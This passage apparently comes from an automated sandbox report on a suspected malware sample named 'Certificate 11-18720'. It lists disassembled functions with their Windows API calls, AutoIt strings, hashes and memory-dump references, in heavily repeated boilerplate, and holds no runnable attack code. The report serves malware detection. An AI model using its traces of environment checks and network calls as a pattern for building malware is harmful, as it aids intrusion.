                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: 9eb34056bdf812fba49b9d636679e05b1560a445d74611c3a69010c50d0b224a
                                                                                    • Instruction ID: 716e9ed4b22b35de70e44776e8f751374cf6884c60ffab205fd08c9e0a277568
                                                                                    • Opcode Fuzzy Hash: 9eb34056bdf812fba49b9d636679e05b1560a445d74611c3a69010c50d0b224a
                                                                                    • Instruction Fuzzy Hash: 5BE0B63A504006BBCB022FA5EC08859FFA7FF8A7613109221F62581575CB36A871EB91
                                                                                    Function 0063B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 51f7ab0246ce471559032be5839777d49cd2667373e36de7e3bee01b6ceef5df
                                                                                    • Instruction ID: f562e33520a1d28a2959faaf021e0c38bab66ad3c65d5ff7655341d52f9ebbd5
                                                                                    • Opcode Fuzzy Hash: 51f7ab0246ce471559032be5839777d49cd2667373e36de7e3bee01b6ceef5df
                                                                                    • Instruction Fuzzy Hash: 5BE012B9900204EFDB015F708848A6E7FAAFB4D350F12A80AF95A8B210CA7498418B50
                                                                                    Function 0063B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 87b869488b410754c59029825c1422f0e6a8a6122dc3e2ee70ff5c35ac6f3dd5
                                                                                    • Instruction ID: aad3bb961045a0b372d5f6c60b828f5cbcfdfc82c737a390ab55825d1d6ea9c1
                                                                                    • Opcode Fuzzy Hash: 87b869488b410754c59029825c1422f0e6a8a6122dc3e2ee70ff5c35ac6f3dd5
                                                                                    • Instruction Fuzzy Hash: 92E046B9900200EFDB019F70C84C66D7FAAFB4D390F12A80AF95A8B320CB7998008F10
                                                                                    Function 005FDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 005FDEAA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3565006973-3941886329
                                                                                    • Opcode ID: efd8b08b4a765ca8c6558007ee6b7f59972c0574f59f6484d4487e5f957261f1
                                                                                    • Instruction ID: ad8950eb7f8f8a93a20c49fd40fc1ccee8fc7766ae2333cacf4550d1490eaa65
                                                                                    • Opcode Fuzzy Hash: efd8b08b4a765ca8c6558007ee6b7f59972c0574f59f6484d4487e5f957261f1
                                                                                    • Instruction Fuzzy Hash: 90912A746006069FDB14DF64C884F6ABBBABF49710F10856EFA4ACF291DB74E841CB60
                                                                                    Function 0060290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy
                                                                                    • String ID: I/c$I/c
                                                                                    • API String ID: 3048848545-4062958339
                                                                                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                    • Instruction ID: 29f7efa74d57cbe5c7b6326fff6b6dabab5615703f9c2732faa71e6d2fa4e57f
                                                                                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                    • Instruction Fuzzy Hash: 9F41D535A40117AACF29DF99C469AFEBBB2FF48310F54505AE881A72D1DB705E82C790
                                                                                    Function 005DBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 005DBCDA
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 005DBCF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 25eaf7a7a74c57977e112fba230a942bbc9c24154b0f84203416489e7efe83e7
                                                                                    • Instruction ID: 9a5dd8109d16fde21a1ae139aaf42bca7e67f100d0145d8f293b38c743739665
                                                                                    • Opcode Fuzzy Hash: 25eaf7a7a74c57977e112fba230a942bbc9c24154b0f84203416489e7efe83e7
                                                                                    • Instruction Fuzzy Hash: 73513A71418745ABE320AF14DC89BAFBBE8FFD4354F41484EF1C8422A6DB7089A88752
                                                                                    Function 0060C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C44ED: __fread_nolock.LIBCMT ref: 005C450B
                                                                                    • _wcscmp.LIBCMT ref: 0060C65D
                                                                                    • _wcscmp.LIBCMT ref: 0060C670
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                    • String ID: FILE
                                                                                    • API String ID: 4029003684-3121273764
                                                                                    • Opcode ID: 8ffc5b39964454013a2271f21af2ad1074f60816970617128efe7090e3ee85dc
                                                                                    • Instruction ID: 095fc8ecaba2a310b7a3c746c573d42e11b40408f64c18f4381c5bdb1e268a9c
                                                                                    • Opcode Fuzzy Hash: 8ffc5b39964454013a2271f21af2ad1074f60816970617128efe7090e3ee85dc
                                                                                    • Instruction Fuzzy Hash: 5141E572A4021ABEDF249BE48C85FEF7BBAAF89710F004469F605EB181D7719A048B55
                                                                                    Function 0062A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0062A85A
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0062A86F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: f3c7173f07d726a5f31dec7bfddd4920da405cab065cfbc74c3f07d70df7da60
                                                                                    • Instruction ID: 9d557c8ad6dd5c33e56d1fb5fc504a3850ba5991f5ad6bab0a1dae3bdff3aa64
                                                                                    • Opcode Fuzzy Hash: f3c7173f07d726a5f31dec7bfddd4920da405cab065cfbc74c3f07d70df7da60
                                                                                    • Instruction Fuzzy Hash: 75411B78E017199FDB14CFA4D880BDA7BBAFB09300F10016AE905EB341D774A942CF95
                                                                                    Function 0062975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0062980E
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0062984A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: 31490107dc6fe10465304746f7e0e5bc6ef6ce9d9fc20ae3b0bac4ee3b24fad6
                                                                                    • Instruction ID: 186512924f3052e5cc103a87164d9ee0035599b5998019c906906966a34ce743
                                                                                    • Opcode Fuzzy Hash: 31490107dc6fe10465304746f7e0e5bc6ef6ce9d9fc20ae3b0bac4ee3b24fad6
                                                                                    • Instruction Fuzzy Hash: F331A471110614AEDB109F78DC80BFB77AAFF99750F04861AF8A9C7250C635AC41CB60
                                                                                    Function 00605157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006051C6
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00605201
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 69c591e672a163ec44969582671e1055c22368a800844eda87c16b8f88cc2e9b
                                                                                    • Instruction ID: 97c23f1a86946372121004bc6fe6c8202135191eff01f97e200f042c728534cd
                                                                                    • Opcode Fuzzy Hash: 69c591e672a163ec44969582671e1055c22368a800844eda87c16b8f88cc2e9b
                                                                                    • Instruction Fuzzy Hash: 9E318131A40605EBEB28CF99D845BDFBBBAAF45350F144419E986A62E0D7709A44CF10
                                                                                    Function 0061658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __snwprintf
                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                    • API String ID: 2391506597-2584243854
                                                                                    • Opcode ID: e86679bcc9bf75623ef5fb7c11f9a1802210e21e3897633d62d07aff7c279462
                                                                                    • Instruction ID: 5cc91418111e3b514ca829c7840b35dbf9e3eb5ea5ecefedfa318ce8f10a282a
                                                                                    • Opcode Fuzzy Hash: e86679bcc9bf75623ef5fb7c11f9a1802210e21e3897633d62d07aff7c279462
                                                                                    • Instruction Fuzzy Hash: D5218435600119AFCF10EFA4C885FEE7BB6BF85300F054459F505AB251DB70EA85DBA6
                                                                                    Function 006293CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0062945C
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00629467
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: 54a3d1854c0e16c7fcf25317f1155ff0612bde9cdefb5323c46bddf3605f3751
                                                                                    • Instruction ID: b446e9157bc15ee65e8e1a9cc9cc6933e0ebfccd5ffa6751152f870a9397014c
                                                                                    • Opcode Fuzzy Hash: 54a3d1854c0e16c7fcf25317f1155ff0612bde9cdefb5323c46bddf3605f3751
                                                                                    • Instruction Fuzzy Hash: A0119371300519BFEF15DE54EC80EEB37AFEB893A4F104125F9199B290D6319C528B70
                                                                                    Function 0062DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • GetActiveWindow.USER32 ref: 0062DA7B
                                                                                    • EnumChildWindows.USER32(?,0062D75F,00000000), ref: 0062DAF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                    • String ID: T1a
                                                                                    • API String ID: 3814560230-1746667778
                                                                                    • Opcode ID: 63ac2586d76317000c446fcc74359313162fcca306146409572421a7c83496ee
                                                                                    • Instruction ID: 772a52918b1b50b5b29ec8a944b37829234b13a2d8bbaaea0900096771ac410d
                                                                                    • Opcode Fuzzy Hash: 63ac2586d76317000c446fcc74359313162fcca306146409572421a7c83496ee
                                                                                    • Instruction Fuzzy Hash: D8211D75204611DFCB24DF28E854AA577EBFF9A321F250719E9A58B3E0E730A841CF50
                                                                                    Function 006298FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                      • Part of subcall function 005DD17C: GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                      • Part of subcall function 005DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00629968
                                                                                    • GetSysColor.USER32(00000012), ref: 00629982
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: f1ee6f579a8b5aee6b5e2689a5b501e1253e776af17b352dc9af70d49abdc1fb
                                                                                    • Instruction ID: 866b39001700fc9438024627b1f2bfb782b4b832e1740920445d03f5c14db16d
                                                                                    • Opcode Fuzzy Hash: f1ee6f579a8b5aee6b5e2689a5b501e1253e776af17b352dc9af70d49abdc1fb
                                                                                    • Instruction Fuzzy Hash: FC11CA72910209AFDB04DFB8CC45AEA7BB9FB48314F044629F945D3240E730E850CB20
                                                                                    Function 00629617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00629699
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006296A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: 798fe4f1946d5e7a6bc8ae2819a38fba2991c30854e915d2ee8f84a44ae4ca57
                                                                                    • Instruction ID: 278da2e3c3aaef1ba030bf24675fc4db7e4efb94c3a352623bcb6d6c4388bbd8
                                                                                    • Opcode Fuzzy Hash: 798fe4f1946d5e7a6bc8ae2819a38fba2991c30854e915d2ee8f84a44ae4ca57
                                                                                    • Instruction Fuzzy Hash: 5B119A71500518AAFB205FA4EC44AEB3BABEB85368F104324F965932E0C7319C519B60
                                                                                    Function 00605262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006052D5
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006052F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: fb8c52d15e53a96c265193482fca8eabd0b15ad23b5ceb55b349f38b7616bc76
                                                                                    • Instruction ID: 5abb09ad60125c767b481cb6ef3ed321e046fe9aaace1fc6f0a82a4520707c35
                                                                                    • Opcode Fuzzy Hash: fb8c52d15e53a96c265193482fca8eabd0b15ad23b5ceb55b349f38b7616bc76
                                                                                    • Instruction Fuzzy Hash: 0F110371941614ABDB1CDA98C905BDF77BAAB06350F041116E843A72D0E3B0AE01CF90
                                                                                    Function 00614D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00614DF5
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00614E1E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: a8bb937602cefd9016c05abe8d370f185f99b1a6090e4d989ca3bedf898cd44c
